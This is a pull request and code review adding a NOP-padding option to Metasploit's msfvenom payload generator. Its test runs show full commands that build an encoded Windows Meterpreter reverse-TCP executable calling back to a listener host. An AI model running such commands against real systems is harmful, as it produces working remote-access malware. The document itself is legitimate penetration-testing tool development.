### PR TITLE
#6100 : --pad-nops option for msfvenom

### PR DESCRIPTION
**Pull request by runt1me**
Adds an option `--pad-size <payload size>` to msfvenom to prepend a NOP sled of appropriate length given total `<payload size>`.

Relevant issue: [msfvenom - total payload space, fill with nops #6100](https://github.com/rapid7/metasploit-framework/issues/6100)

## Verification
- [x] Run `msfvenom` with `--pad-size` option on the console (various use cases shown below)

#### Correct usage, --pad-size larger than payload size
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Successfully added NOP sled of size 52 from x86/single_byte
Payload size: 420 bytes
Final size of exe file: 73802 bytes
```
#### --pad-size equal to payload size (no NOP sled added, but no errors thrown)
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 368 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
```
#### --pad-size less than payload size but greater than zero (error is raised, no executable generated)
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 367 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Error: pad-size value 367 is less than payload size.
```
#### --pad-size less than or equal to zero - don't know why anyone would do this, but no NOP sled is added
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 0 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
```
#### --pad-size and -n options are both given - generates an error
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -n 52 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Error: Option --pad-size and -n cannot be used together
```

### CODE REVIEW

**Comment by runt1me** [comment]
ping @FireFart @jvazquez-r7 @bcook-r7 - committers who commented on original issue

**Comment by bwatters-r7** [comment]
Makes sense to me....
It does not appear to break anything when not in use (at least on windows).....  I'll run some more tests using it to be sure.
image

**Comment by busterb** [comment]
Thanks, checking it out.

File: lib/msf/core/payload_generator.rb [hunk 1]
```diff
@@ -124,6 +130,7 @@ def initialize(opts={})
       @iterations = opts.fetch(:iterations, 1)
       @keep       = opts.fetch(:keep, false)
       @nops       = opts.fetch(:nops, 0)
+			@padsize		= opts.fetch(:padsize, 0)
```
[the remark this answers is not in the document]
Comment (7043mcgeep) [reply lib/msf/core/payload_generator.rb]: Thanks, sorry about this. I'll be more careful in the future.

**Comment by busterb** [comment]
Testing, I can fixup the whitespace nits noticed in the code, not a biggie.

**Comment by busterb** [comment]
After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of `-n`. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

**Comment by 7043mcgeep** [comment]
> After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of `-n`. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

I don't quite understand. Currently pad-size takes a parameter which represents total desired payload size. If pad-size is a switch, how does venom know the amount of nop bytes to prepend?

**Comment by busterb** [comment]
Sorry, I wasn't very clear. I was thinking more like this with a slightly modified flag:

`msfvenom -n 1024` means prepend 1024 nop bytes (current behavior)
`msfvenom -n 1024 --pad-nops` means prepend nop bytes until the total size is 1024

That way we don't need the error check like "Option --pad-size and -n cannot be used together", the flag just makes it do the extra math accounting for the payload size. If that's confusing, we can keep this as-is.

**Comment by busterb** [comment]
Great, thanks! Checking it out now.

**Comment by busterb** [comment]
## Release Notes

This adds a --pad-nops option for msfvenom to pad a payload up to -n nops bytes. This is useful when replacing shellcode in an exploit with a fixed-length payload.

**Comment by busterb** [comment]
Thanks @runt1me !

**Pull request merged**